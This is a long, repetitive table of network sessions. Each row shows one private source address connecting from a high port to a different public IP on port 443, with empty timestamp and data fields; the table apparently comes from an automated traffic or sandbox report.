                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10434192.168.2.2332790222.29.139.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10435192.168.2.2334698108.243.30.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10436192.168.2.2354910126.246.8.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10437192.168.2.2353746206.186.173.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10438192.168.2.2355094147.133.144.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10439192.168.2.2343440124.115.193.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10440192.168.2.2339754165.255.103.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10441192.168.2.2349440193.108.122.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10442192.168.2.235235849.0.207.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10443192.168.2.234090258.119.222.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10444192.168.2.233670838.197.62.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10445192.168.2.2344428117.137.209.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10446192.168.2.2337050145.65.3.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10447192.168.2.235476868.17.19.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10448192.168.2.2360212197.192.226.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10449192.168.2.2347998219.80.179.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10450192.168.2.235946657.34.141.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10451192.168.2.233511023.175.196.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10452192.168.2.234117638.164.180.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10453192.168.2.2353190136.88.47.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10454192.168.2.2352934115.46.193.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10455192.168.2.234264095.37.211.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10456192.168.2.234017084.8.194.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10457192.168.2.234525657.250.230.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10458192.168.2.2345478128.110.11.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10459192.168.2.2342224217.146.160.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10460192.168.2.2341956183.214.134.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10461192.168.2.234908035.236.207.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10462192.168.2.2337254103.128.233.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10463192.168.2.233418046.80.81.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10464192.168.2.2356024134.168.66.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10465192.168.2.234477094.56.219.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10466192.168.2.233950632.48.128.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10467192.168.2.234973894.16.247.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10468192.168.2.234425480.70.200.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10469192.168.2.2352582211.130.195.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10470192.168.2.2355338207.104.100.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10471192.168.2.235300285.29.153.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10472192.168.2.2333300142.93.215.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10473192.168.2.235794298.52.161.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10474192.168.2.235327492.255.27.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10475192.168.2.2333338182.85.201.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10476192.168.2.2360516221.137.2.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10477192.168.2.235234837.173.191.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10478192.168.2.233769681.93.230.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10479192.168.2.23382761.251.107.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10480192.168.2.235069643.246.124.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10481192.168.2.236093440.174.238.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10482192.168.2.2332868159.198.131.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10483192.168.2.234529637.32.150.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10484192.168.2.234538027.28.132.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10485192.168.2.2342568202.255.23.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10486192.168.2.234664468.232.131.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10487192.168.2.2352430132.194.38.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10488192.168.2.2340332156.181.241.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10489192.168.2.233528067.118.46.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10490192.168.2.2340522199.112.32.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10491192.168.2.236071858.175.237.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10492192.168.2.2339428165.228.53.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10493192.168.2.234975641.80.91.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10494192.168.2.2347876138.133.236.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10495192.168.2.2354198178.142.139.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10496192.168.2.234869092.200.254.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10497192.168.2.2353422207.205.172.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10498192.168.2.235091099.233.2.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10499192.168.2.234113039.74.39.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10500192.168.2.233754490.184.35.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10501192.168.2.235701487.166.220.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10502192.168.2.2352282126.240.9.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10503192.168.2.23431802.177.109.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10504192.168.2.2358054189.239.118.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10505192.168.2.2337674204.67.153.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10506192.168.2.23597505.193.47.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10507192.168.2.2357640101.143.191.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10508192.168.2.2352318116.20.196.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10509192.168.2.2355178126.81.193.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10510192.168.2.2347130162.99.255.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10511192.168.2.2353372140.17.0.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10512192.168.2.2339268178.203.182.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10513192.168.2.2334648161.123.239.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10514192.168.2.2351694200.118.248.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10515192.168.2.2333208201.238.132.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10516192.168.2.2354428104.126.226.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10517192.168.2.2345346199.49.184.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10518192.168.2.2351104198.80.26.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10519192.168.2.234457413.3.103.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10520192.168.2.2358660205.91.251.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10521192.168.2.234042035.0.17.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10522192.168.2.2347448133.123.112.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10523192.168.2.2350118198.203.205.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10524192.168.2.234920412.67.22.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10525192.168.2.236088212.160.11.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10526192.168.2.233515840.167.165.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10527192.168.2.2359676197.198.139.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10528192.168.2.2360920203.112.227.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10529192.168.2.233987854.192.117.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10530192.168.2.2336462116.124.111.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10531192.168.2.235283438.21.13.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10532192.168.2.234877648.56.200.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10533192.168.2.2347240170.0.162.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10534192.168.2.2343108171.167.232.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10535192.168.2.2351030156.127.150.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10536192.168.2.235783244.240.20.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10537192.168.2.2352066222.182.128.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10538192.168.2.234118623.31.231.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10539192.168.2.234355459.147.25.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10540192.168.2.234113268.150.45.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10541192.168.2.235609489.156.229.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10542192.168.2.2337446100.228.52.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10543192.168.2.234877885.135.130.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10544192.168.2.2345738175.45.57.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10545192.168.2.235923094.134.227.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10546192.168.2.234724475.216.152.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10547192.168.2.2355892130.26.53.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10548192.168.2.2350036156.117.196.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10549192.168.2.2337624173.36.7.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10550192.168.2.2352528118.248.10.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10551192.168.2.2355644205.48.91.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10552192.168.2.234632020.240.41.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10553192.168.2.2332844200.5.54.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10554192.168.2.233882441.126.27.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10555192.168.2.2336862220.105.254.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10556192.168.2.235716898.95.39.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10557192.168.2.2339396133.1.146.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10558192.168.2.2339820204.198.124.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10559192.168.2.2334698203.217.202.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10560192.168.2.2347610100.174.143.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10561192.168.2.2340036182.54.129.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10562192.168.2.2337402154.36.208.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10563192.168.2.2340146165.32.145.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10564192.168.2.234631882.227.218.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10565192.168.2.2334566210.179.244.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10566192.168.2.2338772205.151.175.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10567192.168.2.2359730202.159.126.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10568192.168.2.2360304178.65.208.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10569192.168.2.234991234.26.0.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10570192.168.2.234984071.89.81.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10571192.168.2.2337210148.54.209.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10572192.168.2.236015875.222.174.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10573192.168.2.2338890221.82.114.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10574192.168.2.2341282213.43.53.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10575192.168.2.235395490.114.166.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10576192.168.2.2338318124.121.72.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10577192.168.2.2355926135.137.114.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10578192.168.2.233411657.245.142.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10579192.168.2.2336636190.221.170.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10580192.168.2.235604669.147.192.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10581192.168.2.2335906199.222.190.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10582192.168.2.2340642119.23.81.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10583192.168.2.2338390141.110.205.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10584192.168.2.233952085.30.110.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10585192.168.2.233340850.174.158.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10586192.168.2.2353294187.214.203.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10587192.168.2.2340158101.100.120.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10588192.168.2.2345750213.173.39.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10589192.168.2.2347048152.107.64.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10590192.168.2.2344304136.18.116.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10591192.168.2.2349428205.82.145.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10592192.168.2.233399631.253.4.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10593192.168.2.2341362176.99.161.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10594192.168.2.23495605.56.229.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10595192.168.2.2352970177.122.236.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10596192.168.2.2334892128.182.80.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10597192.168.2.2355018117.214.198.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10598192.168.2.235545060.99.195.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10599192.168.2.233680631.240.214.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10600192.168.2.23491582.175.69.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10601192.168.2.2354202198.91.80.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10602192.168.2.2351534207.253.21.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10603192.168.2.234776874.219.146.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10604192.168.2.2342632138.181.173.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10605192.168.2.2358330197.165.92.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10606192.168.2.235189049.249.168.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10607192.168.2.233959478.188.64.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10608192.168.2.2348646133.188.94.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10609192.168.2.234959061.100.120.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10610192.168.2.23594562.162.49.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10611192.168.2.2345830144.196.64.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10612192.168.2.233415253.221.181.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10613192.168.2.2356746185.150.119.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10614192.168.2.2335572185.236.78.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10615192.168.2.2334732168.1.10.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10616192.168.2.2342122130.58.88.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10617192.168.2.235579450.93.52.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10618192.168.2.2360506151.87.235.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10619192.168.2.233856825.235.168.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10620192.168.2.2339030183.60.207.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10621192.168.2.2358486156.111.146.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10622192.168.2.235058839.106.173.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10623192.168.2.2341352205.86.61.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10624192.168.2.2351124165.222.57.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10625192.168.2.235495466.229.248.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10626192.168.2.233469698.117.42.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10627192.168.2.2345734178.228.120.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10628192.168.2.2354570102.223.38.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10629192.168.2.233942632.68.225.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10630192.168.2.2335226207.209.136.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10631192.168.2.235317490.116.41.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10632192.168.2.2337974195.108.47.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10633192.168.2.2340486120.138.75.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10634192.168.2.2347998146.222.204.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10635192.168.2.235684245.192.48.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10636192.168.2.2350520160.137.207.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10637192.168.2.23580825.143.227.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10638192.168.2.2342530201.20.47.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10639192.168.2.233734239.26.125.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10640192.168.2.2352192151.152.136.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10641192.168.2.2335724167.234.27.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10642192.168.2.2347308126.136.38.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10643192.168.2.2337280180.229.87.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10644192.168.2.2360630208.253.199.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10645192.168.2.2344624161.110.109.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10646192.168.2.2346776134.184.41.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10647192.168.2.2346290105.27.24.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10648192.168.2.233578854.248.199.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10649192.168.2.234689054.121.129.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10650192.168.2.235075492.216.163.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10651192.168.2.2334134195.159.233.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10652192.168.2.233431272.209.209.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10653192.168.2.2336414146.110.46.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10654192.168.2.2335078164.243.125.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
